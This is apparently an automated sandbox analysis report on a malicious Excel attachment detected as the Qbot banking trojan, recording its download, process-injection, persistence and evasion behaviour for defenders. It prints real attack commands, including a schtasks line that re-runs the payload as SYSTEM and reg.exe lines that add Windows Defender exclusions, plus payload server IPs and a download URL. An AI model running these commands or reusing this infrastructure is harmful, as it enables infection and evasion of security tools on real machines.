Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0A55C FindResourceA, 8_2_6CB0A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\level\match\lift_Fit\set\Nation\Heat.pdb source: regsvr32.exe, 00000008.00000002.646420576.000000006CB42000.00000002.00020000.sdmp, explorer.exe, 00000009.00000003.646985681.0000000002760000.00000004.00000001.sdmp, regsvr32.exe, 0000000D.00000002.723731467.000000006CB42000.00000002.00020000.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000009.00000003.646641483.0000000002760000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000003.723947721.00000000015F0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22897 push FFFFFFC9h; retf 8_2_6CB22899
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB258D9 push esp; iretd 8_2_6CB258DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB290CF push dword ptr [edi+5B8515F0h]; ret 8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2841A push esp; ret 8_2_6CB2841B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB23001 push ebx; iretd 8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB26C06 push edi; ret 8_2_6CB26C07
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2285F pushad ; ret 8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27DA1 push ebp; ret 8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27DAE push ebp; ret 8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2393C push ebx; ret 8_2_6CB23974
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2912F push dword ptr [edi+5B8515F0h]; ret 8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB21698 push edi; ret 8_2_6CB216A4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22E99 push ebx; iretd 8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB23EFE push 488B8349h; iretd 8_2_6CB23F20
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB232C0 push eax; ret 8_2_6CB232C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB24237 push esp; retf 8_2_6CB24285
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27227 push ds; iretd 8_2_6CB27230
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2320C push es; ret 8_2_6CB2322F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB223BE push ebp; ret 8_2_6CB2242F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2838C pushfd ; iretd 8_2_6CB2838D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22762 pushad ; ret 8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB21765 push eax; retf 8_2_6CB21766
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2175A push ebp; ret 8_2_6CB21762
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC09C21 push dword ptr [esi]; iretd 8_2_6CC09C26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC0A23E push eax; iretd 8_2_6CC0A23F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FA00E push ebx; ret 9_2_000FA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FD485 push FFFFFF8Ah; iretd 9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FD4B6 push FFFFFF8Ah; iretd 9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F9D5C push cs; iretd 9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F9E5E push cs; iretd 9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FBB21 push esi; iretd 9_2_000FBB26
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress, 8_2_6CB0DFEF
PE file contains an invalid checksum
Source: Celod.wac2.9.dr Static PE information: real checksum: 0x10c364 should be: 0x10e35b
Source: Celod.wac2.14.dr Static PE information: real checksum: 0x10c364 should be: 0x5c82

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 44102D value: E9 9B 4C CA FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: 44102D value: E9 9B 4C C4 FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2980 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2624 Thread sleep time: -92000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2272 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276 Thread sleep time: -64000s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 8_2_6CB0D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW, 8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW, 9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW, 14_2_0008AEF6

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB05F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 8_2_6CB05F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress, 8_2_6CB0DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08D44 mov eax, dword ptr fs:[00000030h] 8_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08C18 mov eax, dword ptr fs:[00000030h] 8_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08923 push dword ptr fs:[00000030h] 8_2_6CC08923
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08D44 mov eax, dword ptr fs:[00000030h] 13_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08C18 mov eax, dword ptr fs:[00000030h] 13_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08923 push dword ptr fs:[00000030h] 13_2_6CC08923
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000E5A54 RtlAddVectoredExceptionHandler, 9_2_000E5A54
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00085A54 RtlAddVectoredExceptionHandler, 14_2_00085A54

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 44102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: 44102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Rebate-690835286-10052021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2' Jump to behavior
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000E31B5 CreateNamedPipeA, 9_2_000E31B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB097ED GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 8_2_6CB097ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 8_2_6CB0D061

Stealing of Sensitive Information:

barindex
Yara detected Qbot
Source: Yara match File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Qbot
Source: Yara match File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 497532 Sample: Rebate-690835286-10052021.xls Startdate: 05/10/2021 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Antivirus detection for URL or domain 2->56 58 Document exploit detected (drops PE files) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 194 32 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 48 185.123.53.199, 80 TELE-ASTeleAsiaLimitedHK unknown 9->48 50 101.99.90.118, 49169, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->50 52 194.36.191.21, 80 HSAE Netherlands 9->52 46 C:\Users\user\...\44474.9279916667[1].dat, PE32 9->46 dropped 76 Document exploit detected (UrlDownloadToFile) 9->76 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        68 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->68 70 Injects code into the Windows Explorer (explorer.exe) 24->70 72 Writes to foreign memory regions 24->72 74 2 other signatures 24->74 32 explorer.exe 8 1 24->32         started        process9 file10 78 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->78 80 Injects code into the Windows Explorer (explorer.exe) 29->80 82 Writes to foreign memory regions 29->82 86 2 other signatures 29->86 35 explorer.exe 8 1 29->35         started        44 C:\Users\user\Celod.wac2, PE32 32->44 dropped 84 Uses cmd line tools excessively to alter registry or file data 32->84 38 reg.exe 1 32->38         started        40 reg.exe 1 32->40         started        signatures11 process12 signatures13 62 Uses cmd line tools excessively to alter registry or file data 35->62 64 Drops PE files to the user root directory 35->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 35->66 42 schtasks.exe 35->42         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.123.53.199
 unknown unknown
133398 TELE-ASTeleAsiaLimitedHK false
101.99.90.118
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY false
194.36.191.21
 unknown Netherlands
60117 HSAE false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://101.99.90.118/44474.9279916667.dat true
  • Avira URL Cloud: phishing
 unknown